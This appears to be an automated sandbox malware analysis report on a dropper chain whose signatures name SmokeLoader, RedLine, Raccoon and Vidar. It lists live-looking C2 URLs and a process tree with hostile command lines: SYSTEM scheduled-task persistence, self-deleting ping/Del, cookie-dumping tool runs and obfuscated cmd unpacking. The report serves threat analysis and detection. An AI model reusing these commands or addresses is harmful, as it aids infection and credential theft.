Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1799s
  • max time network
    1758s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    05-05-2021 12:58

General

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 63 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 43 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        PID:872
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {01C1C868-A2F4-45B9-A8FD-92A7FB93CF79} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
          • Loads dropped DLL
          PID:1800
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2320
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
            4⤵
            • Executes dropped EXE
            PID:2508
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
            4⤵
            • Executes dropped EXE
            PID:4552
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
            4⤵
            • Executes dropped EXE
            PID:5400
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
            4⤵
            • Executes dropped EXE
            PID:5432
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
            4⤵
            • Executes dropped EXE
            PID:6268
          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
            4⤵
            • Executes dropped EXE
            PID:8128
          • C:\Windows\system32\rundll32.exe
            C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll",NXfSHgjpzLhX
            4⤵
            • Windows security modification
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            PID:4416
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {6CA5EC84-9C7E-465D-B18F-BC127740AEB6} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
          3⤵
            PID:2444
            • C:\Users\Admin\AppData\Roaming\utatfjg
              C:\Users\Admin\AppData\Roaming\utatfjg
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2808
              • C:\Users\Admin\AppData\Roaming\utatfjg
                C:\Users\Admin\AppData\Roaming\utatfjg
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2164
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {77421153-D62C-4CEF-9EB8-55E1D3A6752A} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:668
              • C:\Users\Admin\AppData\Roaming\utatfjg
                C:\Users\Admin\AppData\Roaming\utatfjg
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1424
                • C:\Users\Admin\AppData\Roaming\utatfjg
                  C:\Users\Admin\AppData\Roaming\utatfjg
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:8116
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {EF25AE2B-74BA-4453-870B-B17D88ED9D3F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:4364
                • C:\Users\Admin\AppData\Roaming\utatfjg
                  C:\Users\Admin\AppData\Roaming\utatfjg
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4408
                  • C:\Users\Admin\AppData\Roaming\utatfjg
                    C:\Users\Admin\AppData\Roaming\utatfjg
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4536
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              2⤵
              • Enumerates connected drives
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:2348
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 31A7BBB77496D089C081A4B2129F810E C
                3⤵
                • Loads dropped DLL
                PID:2528
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 86C7A88E24DBCE428C9134B143A4855E
                3⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                PID:2068
                • C:\Windows\SysWOW64\taskkill.exe
                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                  4⤵
                  • Kills process with taskkill
                  PID:2228
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 71A5D0F8E93E95C0815978B24E5FDC2E M Global\MSI0000
                3⤵
                • Loads dropped DLL
                PID:2608
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              • Modifies registry class
              PID:2640
          • C:\Users\Admin\AppData\Local\Temp\Install2.exe
            "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1084
            • C:\Users\Admin\AppData\Local\Temp\is-2IUL7.tmp\Install2.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-2IUL7.tmp\Install2.tmp" /SL5="$50154,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Users\Admin\AppData\Local\Temp\is-EDV07.tmp\Ultra.exe
                "C:\Users\Admin\AppData\Local\Temp\is-EDV07.tmp\Ultra.exe" /S /UID=burnerch1
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:860
                • C:\Program Files\Java\YBBFWNYNOE\ultramediaburner.exe
                  "C:\Program Files\Java\YBBFWNYNOE\ultramediaburner.exe" /VERYSILENT
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1848
                  • C:\Users\Admin\AppData\Local\Temp\is-SQ2TA.tmp\ultramediaburner.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-SQ2TA.tmp\ultramediaburner.tmp" /SL5="$10162,281924,62464,C:\Program Files\Java\YBBFWNYNOE\ultramediaburner.exe" /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:644
                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                      6⤵
                      • Executes dropped EXE
                      PID:1604
                • C:\Users\Admin\AppData\Local\Temp\55-b349b-3a9-1fd93-5d9c406b5bb9b\Gigequhyqo.exe
                  "C:\Users\Admin\AppData\Local\Temp\55-b349b-3a9-1fd93-5d9c406b5bb9b\Gigequhyqo.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1100
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                    5⤵
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:1624
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1624 CREDAT:275457 /prefetch:2
                      6⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:800
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1624 CREDAT:340994 /prefetch:2
                      6⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2568
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 1408
                        7⤵
                        • Program crash
                        • Suspicious behavior: GetForegroundWindowSpam
                        PID:8184
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1624 CREDAT:668687 /prefetch:2
                      6⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2008
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                    5⤵
                      PID:1856
                  • C:\Users\Admin\AppData\Local\Temp\78-b4098-302-d9da5-19196f0634db8\Byqexeveda.exe
                    "C:\Users\Admin\AppData\Local\Temp\78-b4098-302-d9da5-19196f0634db8\Byqexeveda.exe"
                    4⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:432
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pe0njzrx.1tx\KiffMainE1.exe & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2500
                      • C:\Users\Admin\AppData\Local\Temp\pe0njzrx.1tx\KiffMainE1.exe
                        C:\Users\Admin\AppData\Local\Temp\pe0njzrx.1tx\KiffMainE1.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2556
                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                          dw20.exe -x -s 532
                          7⤵
                          • Suspicious behavior: GetForegroundWindowSpam
                          PID:2684
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jpxjdaqf.sdx\001.exe & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2612
                      • C:\Users\Admin\AppData\Local\Temp\jpxjdaqf.sdx\001.exe
                        C:\Users\Admin\AppData\Local\Temp\jpxjdaqf.sdx\001.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:2660
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oret0gco.4wv\installer.exe /qn CAMPAIGN="654" & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2932
                      • C:\Users\Admin\AppData\Local\Temp\oret0gco.4wv\installer.exe
                        C:\Users\Admin\AppData\Local\Temp\oret0gco.4wv\installer.exe /qn CAMPAIGN="654"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        PID:3008
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\oret0gco.4wv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\oret0gco.4wv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619976615 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                          7⤵
                            PID:2880
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5fpjxl2.zm1\gpooe.exe & exit
                        5⤵
                          PID:2288
                          • C:\Users\Admin\AppData\Local\Temp\l5fpjxl2.zm1\gpooe.exe
                            C:\Users\Admin\AppData\Local\Temp\l5fpjxl2.zm1\gpooe.exe
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Adds Run key to start application
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:2332
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              7⤵
                              • Executes dropped EXE
                              PID:2436
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              7⤵
                              • Executes dropped EXE
                              PID:756
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              7⤵
                              • Executes dropped EXE
                              PID:2248
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              7⤵
                              • Executes dropped EXE
                              PID:8132
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hiftlbj3.g5j\google-game.exe & exit
                          5⤵
                            PID:2428
                            • C:\Users\Admin\AppData\Local\Temp\hiftlbj3.g5j\google-game.exe
                              C:\Users\Admin\AppData\Local\Temp\hiftlbj3.g5j\google-game.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of SetWindowsHookEx
                              PID:2604
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                7⤵
                                • Loads dropped DLL
                                • Modifies registry class
                                PID:2632
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwflsjri.ptc\huesaa.exe & exit
                            5⤵
                              PID:2984
                              • C:\Users\Admin\AppData\Local\Temp\dwflsjri.ptc\huesaa.exe
                                C:\Users\Admin\AppData\Local\Temp\dwflsjri.ptc\huesaa.exe
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2268
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:672
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2388
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:1000
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2032
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mvyj3asw.so1\setup.exe & exit
                              5⤵
                                PID:3052
                                • C:\Users\Admin\AppData\Local\Temp\mvyj3asw.so1\setup.exe
                                  C:\Users\Admin\AppData\Local\Temp\mvyj3asw.so1\setup.exe
                                  6⤵
                                    PID:2228
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\mvyj3asw.so1\setup.exe"
                                      7⤵
                                        PID:2712
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 1.1.1.1 -n 1 -w 3000
                                          8⤵
                                          • Runs ping.exe
                                          PID:2888
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\al4hdepk.xjn\askinstall39.exe & exit
                                    5⤵
                                      PID:2760
                                      • C:\Users\Admin\AppData\Local\Temp\al4hdepk.xjn\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\al4hdepk.xjn\askinstall39.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:2764
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:2908
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:2440
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0ys0cit.pqx\Setup_v3.exe & exit
                                        5⤵
                                          PID:2344
                                          • C:\Users\Admin\AppData\Local\Temp\a0ys0cit.pqx\Setup_v3.exe
                                            C:\Users\Admin\AppData\Local\Temp\a0ys0cit.pqx\Setup_v3.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2180
                                            • C:\Windows\SysWOW64\at.exe
                                              "C:\Windows\System32\at.exe"
                                              7⤵
                                                PID:968
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                7⤵
                                                  PID:2712
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\System32\cmd.exe
                                                    8⤵
                                                    • Loads dropped DLL
                                                    PID:2716
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                      Fessura.exe.com Z
                                                      9⤵
                                                        PID:2320
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:2468
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:2448
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                              12⤵
                                                              • Creates scheduled task(s)
                                                              PID:8132
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              12⤵
                                                              • Executes dropped EXE
                                                              PID:2344
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              12⤵
                                                              • Executes dropped EXE
                                                              PID:2328
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 127.0.0.1 -n 30
                                                        9⤵
                                                        • Runs ping.exe
                                                        PID:2212
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                        9⤵
                                                          PID:2840
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                      7⤵
                                                        PID:2880
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eqz1yjcc.1jp\toolspab1.exe & exit
                                                    5⤵
                                                      PID:2544
                                                      • C:\Users\Admin\AppData\Local\Temp\eqz1yjcc.1jp\toolspab1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\eqz1yjcc.1jp\toolspab1.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:2576
                                                        • C:\Users\Admin\AppData\Local\Temp\eqz1yjcc.1jp\toolspab1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\eqz1yjcc.1jp\toolspab1.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:2324
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3xp3tl42.dqg\005.exe & exit
                                                      5⤵
                                                        PID:2816
                                                        • C:\Users\Admin\AppData\Local\Temp\3xp3tl42.dqg\005.exe
                                                          C:\Users\Admin\AppData\Local\Temp\3xp3tl42.dqg\005.exe
                                                          6⤵
                                                            PID:2216
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wtfzqo0s.2p5\SunLabsPlayer.exe /S & exit
                                                          5⤵
                                                            PID:2480
                                                            • C:\Users\Admin\AppData\Local\Temp\wtfzqo0s.2p5\SunLabsPlayer.exe
                                                              C:\Users\Admin\AppData\Local\Temp\wtfzqo0s.2p5\SunLabsPlayer.exe /S
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                              PID:2264
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse5360.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:2544
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse5360.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:7924
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
